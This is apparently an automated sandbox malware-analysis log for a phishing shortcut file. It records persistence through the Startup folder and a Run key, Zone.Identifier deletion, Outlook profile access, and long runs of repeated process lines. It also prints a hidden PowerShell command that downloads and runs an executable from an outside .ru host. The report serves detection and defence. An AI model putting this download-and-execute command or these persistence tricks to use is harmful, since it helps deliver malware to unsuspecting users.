                    Source: C:\Users\user\AppData\Local\Temp\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: RTGS-WB-ABS-240730-NEW.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: RegSvcs.pdb, source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr
                    Source: Binary string: wntdll.pdbUGP source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                    Source: recomplaint.exe.3.drStatic PE information: real checksum: 0xa961f should be: 0x1473cb
                    Source: file.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x1473cb
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01670C6D push edi; retf 8_2_01670C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DE0CCC push edi; retf 12_2_00DE0C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DE0C6D push edi; retf 12_2_00DE0C7A

                    Persistence and Installation Behavior

                    barindex
                    Windows shortcut file (LNK) starts blacklisted processes
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\unspattered\recomplaint.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aWUFvJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aWUFvJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
